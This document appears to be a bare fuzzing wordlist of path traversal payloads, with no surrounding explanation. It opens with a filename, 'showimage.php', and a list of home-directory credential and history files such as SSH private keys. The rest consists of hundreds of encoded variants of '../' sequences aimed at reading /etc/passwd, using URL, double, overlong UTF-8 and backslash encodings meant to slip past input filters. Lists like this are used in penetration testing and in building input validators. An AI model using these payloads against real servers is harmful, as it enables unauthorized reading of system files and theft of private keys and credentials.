showimage.php
../../../../../../../etc/passwd
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
~/.atfp_history
~/.bash_history
~/.bash_logout
~/.bash_profile
~/.bashrc
~/.gtkrc
~/.login
~/.logout
~/.mysql_history
~/.nano_history
~/.php_history
~/.profile
~/.ssh/authorized_keys
~/.ssh/id_dsa
~/.ssh/id_dsa.pub
~/.ssh/id_rsa
~/.ssh/id_rsa.pub
~/.ssh/identity
~/.ssh/identity.pub
~/.viminfo
~/.wm_style
~/.Xdefaults
~/.xinitrc
~/.Xresources
~/.xsession
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\
/proc/<int>/fd/<int>
/proc/2116/fd/11
..//etc/passwd
../..//etc/passwd
../../..//etc/passwd
../../../..//etc/passwd
../../../../..//etc/passwd
../../../../../..//etc/passwd
../../../../../../..//etc/passwd
../../../../../../../..//etc/passwd
..%2f/etc/passwd
..%2f..%2f/etc/passwd
..%2f..%2f..%2f/etc/passwd
..%2f..%2f..%2f..%2f/etc/passwd
..%2f..%2f..%2f..%2f..%2f/etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd
%2e%2e//etc/passwd
%2e%2e/%2e%2e//etc/passwd
%2e%2e/%2e%2e/%2e%2e//etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
..%252f/etc/passwd
..%252f..%252f/etc/passwd
..%252f..%252f..%252f/etc/passwd
..%252f..%252f..%252f..%252f/etc/passwd
..%252f..%252f..%252f..%252f..%252f/etc/passwd
..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd
%252e%252e//etc/passwd
%252e%252e/%252e%252e//etc/passwd
%252e%252e/%252e%252e/%252e%252e//etc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd
%252e%252e%252f/etc/passwd
%252e%252e%252f%252e%252e%252f/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd
..\/etc/passwd
..\..\/etc/passwd
..\..\..\/etc/passwd
..\..\..\..\/etc/passwd
..\..\..\..\..\/etc/passwd
..\..\..\..\..\..\/etc/passwd
..\..\..\..\..\..\..\/etc/passwd
..\..\..\..\..\..\..\..\/etc/passwd
..%255c/etc/passwd
..%255c..%255c/etc/passwd
..%255c..%255c..%255c/etc/passwd
..%255c..%255c..%255c..%255c/etc/passwd
..%255c..%255c..%255c..%255c..%255c/etc/passwd
..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd
..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd
%252e%252e\/etc/passwd
%252e%252e\%252e%252e\/etc/passwd..%5c/etc/passwd
..%5c..%5c/etc/passwd
..%5c..%5c..%5c/etc/passwd
..%5c..%5c..%5c..%5c/etc/passwd
..%5c..%5c..%5c..%5c..%5c/etc/passwd
..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
%2e%2e\/etc/passwd
%2e%2e\%2e%2e\/etc/passwd
%2e%2e\%2e%2e\%2e%2e\/etc/passwd
%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd
%2e%2e%5c/etc/passwd
%2e%2e%5c%2e%2e%5c/etc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd
%252e%252e\%252e%252e\%252e%252e\/etc/passwd
%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd
%252e%252e%255c/etc/passwd
%252e%252e%255c%252e%252e%255c/etc/passwd
%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd
..%c0%af/etc/passwd
..%c0%af..%c0%af/etc/passwd
..%c0%af..%c0%af..%c0%af/etc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd
%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae%c0%af/etc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
..%25c0%25af/etc/passwd
..%25c0%25af..%25c0%25af/etc/passwd
..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd
%25c0%25ae%25c0%25ae//etc/passwd
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd
%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd
..%c1%9c/etc/passwd
..%c1%9c..%c1%9c/etc/passwd
..%c1%9c..%c1%9c..%c1%9c/etc/passwd
..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd
%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
..%25c1%259c/etc/passwd
..%25c1%259c..%25c1%259c/etc/passwd
..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd
%25c0%25ae%25c0%25ae\/etc/passwd
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd
%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd
\..//etc/passwd
\../\..//etc/passwd
\../\../\..//etc/passwd
\../\../\../\..//etc/passwd
\../\../\../\../\..//etc/passwd
\../\../\../\../\../\..//etc/passwd
\../\../\../\../\../\../\..//etc/passwd
\../\../\../\../\../\../\../\..//etc/passwd
/..\/etc/passwd
/..\/..\/etc/passwd
/..\/..\/..\/etc/passwd
/..\/..\/..\/..\/etc/passwd
/..\/..\/..\/..\/..\/etc/passwd
/..\/..\/..\/..\/..\/..\/etc/passwd
/..\/..\/..\/..\/..\/..\/..\/etc/passwd
/..\/..\/..\/..\/..\/..\/..\/..\/etc/passwd
...//etc/passwd
.../...//etc/passwd
.../.../...//etc/passwd
.../.../.../...//etc/passwd
.../.../.../.../...//etc/passwd
.../.../.../.../.../...//etc/passwd
.../.../.../.../.../.../...//etc/passwd
.../.../.../.../.../.../.../...//etc/passwd
...\/etc/passwd
...\...\/etc/passwd
...\...\...\/etc/passwd
...\...\...\...\/etc/passwd
...\...\...\...\...\/etc/passwd
...\...\...\...\...\...\/etc/passwd
...\...\...\...\...\...\...\/etc/passwd
...\...\...\...\...\...\...\...\/etc/passwd
....//etc/passwd
..../....//etc/passwd
..../..../....//etc/passwd
..../..../..../....//etc/passwd
..../..../..../..../....//etc/passwd
..../..../..../..../..../....//etc/passwd
..../..../..../..../..../..../....//etc/passwd
..../..../..../..../..../..../..../....//etc/passwd
....\/etc/passwd
....\....\/etc/passwd
....\....\....\/etc/passwd
....\....\....\....\/etc/passwd
....\....\....\....\....\/etc/passwd
....\....\....\....\....\....\/etc/passwd
....\....\....\....\....\....\....\/etc/passwd
....\....\....\....\....\....\....\....\/etc/passwd
..........................................................................//etc/passwd
........................................................................../..//etc/passwd
........................................................................../../..//etc/passwd
........................................................................../../../..//etc/passwd
........................................................................../../../../..//etc/passwd
........................................................................../../../../../..//etc/passwd
........................................................................../../../../../../..//etc/passwd
........................................................................../../../../../../../..//etc/passwd
..........................................................................\/etc/passwd
..........................................................................\..\/etc/passwd
..........................................................................\..\..\/etc/passwd
..........................................................................\..\..\..\/etc/passwd
..........................................................................\..\..\..\..\/etc/passwd
..........................................................................\..\..\..\..\..\/etc/passwd
..........................................................................\..\..\..\..\..\..\/etc/passwd
..........................................................................\..\..\..\..\..\..\..\/etc/passwd
..///etc/passwd
..//..///etc/passwd
..//..//..///etc/passwd
..//..//..//..///etc/passwd
..//..//..//..//..///etc/passwd
..//..//..//..//..//..///etc/passwd
..//..//..//..//..//..//..///etc/passwd
..//..//..//..//..//..//..//..///etc/passwd
..////etc/passwd
..///..////etc/passwd
..///..///..////etc/passwd
..///..///..///..////etc/passwd
..///..///..///..///..////etc/passwd
..///..///..///..///..///..////etc/passwd
..///..///..///..///..///..///..////etc/passwd
..///..///..///..///..///..///..///..////etc/passwd
..\\/etc/passwd
..\\..\\/etc/passwd
..\\..\\..\\/etc/passwd
..\\..\\..\\..\\/etc/passwd
..\\..\\..\\..\\..\\/etc/passwd
..\\..\\..\\..\\..\\..\\/etc/passwd
..\\..\\..\\..\\..\\..\\..\\/etc/passwd
..\\..\\..\\..\\..\\..\\..\\..\\/etc/passwd
..\\\/etc/passwd
..\\\..\\\/etc/passwd
..\\\..\\\..\\\/etc/passwd
..\\\..\\\..\\\..\\\/etc/passwd
..\\\..\\\..\\\..\\\..\\\/etc/passwd
..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd
..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd
./\/.//etc/passwd
./\/././\/.//etc/passwd
./\/././\/././\/.//etc/passwd
./\/././\/././\/././\/.//etc/passwd
./\/././\/././\/././\/././\/.//etc/passwd
./\/././\/././\/././\/././\/././\/.//etc/passwd
./\/././\/././\/././\/././\/././\/././\/.//etc/passwd
./\/././\/././\/././\/././\/././\/././\/././\/.//etc/passwd
.\/\.\/etc/passwd
.\/\.\.\/\.\/etc/passwd
.\/\.\.\/\.\.\/\.\/etc/passwd
.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd